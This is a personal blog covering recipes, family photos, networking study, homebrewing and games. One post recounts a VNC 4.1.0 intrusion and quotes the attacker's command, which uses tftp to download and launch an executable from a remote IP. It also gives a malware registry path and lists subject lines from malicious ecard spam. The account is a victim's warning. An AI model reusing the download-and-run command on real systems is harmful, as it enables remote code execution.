Making Vegetarian Meatloaf

Tried this last night, not to bad really....sauce was a little to much for me, but I'm not a sauce guy. I also think it needed more onions (I also added celery) and garlic.

Neatloaf - served in Sri Chinmoy enterprise restuarants (Ananda Fuara and others around the U.S. and abroad)

4 eggs
2/3 envelope Lipton Onion Soup Mix (the whole packet measures 1/4 cup, so use slightly less or use the whole packet if you like the onion soup mix taste) - for vegetarian version substitute dry soup mix without beef bouillion
1/3 LB low-fat ricotta cheese
1/3 LB firm tofu (mashed into small pieces)
1/4 cup vegetable oil of choice
1/3 cup onions
1/2 cup cooked brown rice
1/2 tsp. oregano
1/2 tsp. basil
1/4 tsp. rosemary (fresh is good)
4 cups (dry measured) Special K (note: this approximately equals 4 oz or 113 grams of the cereal by weight)
1 1/2 tbsp. garlic
FOR THE SAUCE:
1/2 cup ketchup
1/8 cup Dijon mustard
1/4 cup molasses
1/8 cup to 1/4 cup apple cider vinegar (to taste)
Pinch cayenne ground pepper (to taste)

Preheat oven to 300 degrees F.

Sauté onions and garlic.

Beat eggs in a bowl, and then add all other ingredients except the Special K. Mix well and then add the Special K last. Put in pan that is sprayed with cooking oil.

Bake for 1 hour. Pour sauce over loaf after 1 hour, and bake for 10 more minutes.

Found it on this site.

Good to be back

Well I'm back from California, and happy to be home. Networkers was pretty interesting I have to say, learned a lot and learned how much I don't know. For my field it's quite the experience....

And now, here's a picture of me in a silly hat:

Does my face not express that I know I look silly?

At least now I can avoid getting hit with a baseball hat

Jen sent me an email this morning of these pics, figured I'd share them :)

Babies eating lemons

VNC + Server Mode + Version 4.1.0 = Spanked

I setup VNC today to run so I could access my Email, and not 15 minutes afterwards I saw my mouse start moving and a dos window pop up.

I yanked my network cable, and then shut down my modem. This is what I found (i've added spaces to make sure it's not accidentally executed):

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 83.21 7.113.2 07 GET gefgl.exe & start gefgl&

Found gefgl in my windows/system32....a nice file called a.exe, iaxcfg32.dll, and a run command in the registry linked to a.exe called MSMSGR....hell it even added itself to the list of allowed programs in windows firewall as you can see here:

SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List :*:Enabled:WADPXA32

Here's a link to a good breakdown, I saw the same kind of out put in etherreal that she saw, my ethereal captures, shortly there after I renamed all the exe files, and deleted the registry bits....

No. Time Source Destination Protocol Info 8 7.188722 192.168.254.100 192.168.254.254 DNS Standard query A pdfrvgteqe.ecbebpbswppnlhivbogg.com Frame 8 (95 bytes on wire, 95 bytes captured) Ethernet II, Src: Intel_02:9b:1c (00:11:11:02:9b:1c), Dst: 192.168.254.254 (00:a0:65:c8:01:28) Internet Protocol, Src: 192.168.254.100 (192.168.254.100), Dst: 192.168.254.254 (192.168.254.254) User Datagram Protocol, Src Port: 1047 (1047), Dst Port: domain (53) Domain Name System (query)

It seems that there's an exploit in the 4.1.0 release that allowed authentication without a password, and somebody out there is obviously watching for it. Even I'm surprised at how fast they caught me though.

that's that

Greetings...this is my minion

Those cheeks are lethal weapons in 13 states

Yet anothe stray, but don't worry we aren't feeding him....we didn't have any extra orphan souls

Cat, i'm a kitty cat, and I lounge lounge lounge, and I lounge lounge lounge.

Does this box make my ass look big?

it's funny

I think I finally got it last night while I was sitting out on the deck with Jen and Connor. The number of subnets is 2^s, where s = # of 1's in a binary subnet mask. And hosts = 2^h-2, where h= the # of 0's in the mask, minus the network ID and broadcast ID.

Now if I could just do power's of 2 in my head....math is going to be my downfall on this until I just memorize it all.

for the love of god and all that is holy

I hate subnetting....at least doing it by hand. Increments, hosts, subnet's, multiples of 2.....i've given myself a headache 2 days straight. :(

Let the Wii peripherals commence

With E3 going on this past week, all sorts of new things are coming out. Have you seen the new Wii Zapper?

Now is it just me, or am I the only one that thinks it looks a little....well goofy. I had really hoped it would look more like this:

Not to jazzed about it. No idea why Nintendo thought they had to reinvent the wheel here...plus $19 bucks for what is basically just a plastic shell you slap your controller in? WTF, do I look stupid? It probably costs all of 29 cents to make.

morning glory

I could have told you years ago that travelling downtown wasn't for me. I'm just not the kind of guy who likes to sit still for an hour, after driving 1/2 hour to the train station, just so I can go someplace and do the exact same stuff I can do just by rolling out of bed. Heck I could do it in bed.

In my mind, when all is said and done, that's 3 hours I could have spent doing important things...playing with Connor, spending time with Jen, maybe even a little video game action.

I think perhaps I would feel differently if the Metra had wireless...but even then, I'm already shoehorned into a tiny little seat, I can't imagine even having the room to move the mouse. I mean I already have an excel sheet of the last year of syslog messages to go through, but I just can't think of how I'd navigate in that tiny area. I could sit down below if I wanted, but then because of the morning rush, you end up sitting with 3 other strangers and at least up top I'm not pressed up against somebody elses fat rolls. I'll save that pleasure for when I fly to CA in a few weeks.

That reminds me, I hear the Blue Dragon demo is out on xbox live....I need to remember to download that. I have huge hopes for it after playing Dragon Quest 8.....let's hope it's the first good RPG for the 360

now if you'll excuse me, i need to get my ass in gear

barleywine bubbles, yay!

Well, the good news is there are some bubbles coming out of the primary fermenter, so at least we've achieved a reaction. Now it just 6 months we'll have delicious barleywine to drink. Here are some pics I snapped during the brewing yesterday, of course there aren't many because once things get going, there's just no time.

And of course the guest of honor was slacking in his duties:

But he makes up for it by being cute other times:

Of course let's not forget about Gizmo....he has his moments as well:

July 08, 2007

Why am I sitting next to a fire in 95 degree weather?

Because today is the day we make the inaugural batch of "Babies first Barley wine" :)

Since I destroyed my last pot, I haven't been able to make any new beers (mental note, bleach and aluminum are not friends) so Jen took pity upon me and ordered not just a new 20 quart pot, but but also the ingrediants to make a barley wine beer (probably my favorite style).

Of course a little good juju doesn't hurt, so we just busted open a few of the last bottle from the wedding brew we made last year. Caught a boil over just in time after adding the target hops, so I'm just relaxing right now and thanking god that this laptop has wireless. ;)

Here's some videos to check out:

Halloween prank gone wrong....or right?

obviously speed up, but still interesting to watch...no she is not popping and locking

making friends with binary

Today Connor and I did a little studying and learned how to convert decimal to binary. It's one of those things I've avoided learning over the years, but once I actually sat down and did it I realized how pathetically easy it was to do. Of course I'm referring to 8bit, but I'm sure I could do 16bit if I tried.

Also, let's take a moment to bow our heads in respect, for today was the day I sold back Dead Rising to Game spot. After getting 980 out of 1000 achievement points I knew that it would be forever until I played it again. I mean I've probably already played it 5 times just to get those, and there's no way in hell I was gonna try to take on 7 day survivor just so I can run around in my boxers disemboweling zombies.....despite how fun that sounds.

It's just a testament to how great the game was that I played it that much, despite the horrible NPC AI that the survivors had, alot can be forgiven when you can dress up like mega man and kill psychos. :)

just another photo update

continuing our discussion about virus/spam

So on 7/3 I received 14 of these fake ecard emails, all appear to come from legitimate addresses like:
bluemountain.com
greetingCard.org
freewebcards.com

yadda, yadda...faking the From field in an email is childs play now a days, but what's really scary are the IP's. Almost all of them are from normal users who got spanked with this virus and then turned into zombie bots. Now that scares the hell out of me that somebody was able to get this exploit out and have it propigate itself.

happy 4th of July...or as I call it Wednesday

While it sure is nice to have a day off in the middle of the week, I'm afraid my celebrating is limited to housework mostly.

Be on the look out for a new trend in nasty spam/virus emails. There's a whole list of bullshit subjects that sound like this:

Your Nations Birtday
Forth of July Party
God Bless America
Celebrate your nation
Independence Day Party
Happy Fourth of July
American Pride, On The 4th
America the beautiful
America's B-Day

They pretend they are an ecard from somebody, but they use generic and obviously fake identifiers such as "friend" or "school mate"....who the fuck says school mate? Anyways, the link is always an IP address with some encoded hex. Don't even click on the link, aside from the nasty "ecard.exe" it tries t get you to download, it uses 3 different exploits to screw you from the get go.

if your technical, here's a good write up of it here.
